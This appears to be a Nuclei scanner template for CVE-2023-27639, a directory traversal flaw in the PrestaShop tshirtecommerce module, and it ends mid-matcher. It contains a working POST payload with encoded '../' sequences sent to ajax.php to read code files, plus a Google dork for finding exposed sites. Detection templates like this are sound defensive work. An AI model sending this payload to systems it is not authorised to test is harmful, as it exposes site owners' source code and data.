id: CVE-2023-27639 info: name: PrestaShop TshirteCommerce - Directory Traversal author: MaStErChO severity: high description: | The Custom Product Designer (tshirtecommerce) module for PrestaShop allows HTTP requests to be forged using POST and GET parameters, enabling a remote attacker to perform directory traversal on the system and view the contents of code files. reference: - https://www.cvedetails.com/cve/CVE-2023-27639/ - https://security.friendsofpresta.org/module/2023/03/30/tshirtecommerce_cwe-22.html - https://nvd.nist.gov/vuln/detail/CVE-2023-27639 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-27639 cwe-id: CWE-22 epss-score: 0.04002 epss-percentile: 0.9185 cpe: cpe:2.3:a:tshirtecommerce:custom_product_designer:*:*:*:*:*:prestashop:*:* metadata: verified: true max-request: 1 vendor: tshirtecommerce product: custom_product_designer framework: prestashop google-query: inurl:"/tshirtecommerce/" tags: cve,cve2023,prestashop,tshirtecommerce,lfi http: - method: POST path: - "{{BaseURL}}/tshirtecommerce/ajax.php?type=svg" headers: Content-Type: application/x-www-form-urlencoded body: "url=.%2F..%2Fvendor%2Fjdorn%2Fsql-formatter%2Fexamples&file_name=examples.php" matchers-condition: and matchers: - type: word words: - "SqlFormatter Examples" - "SqlFormatter" - "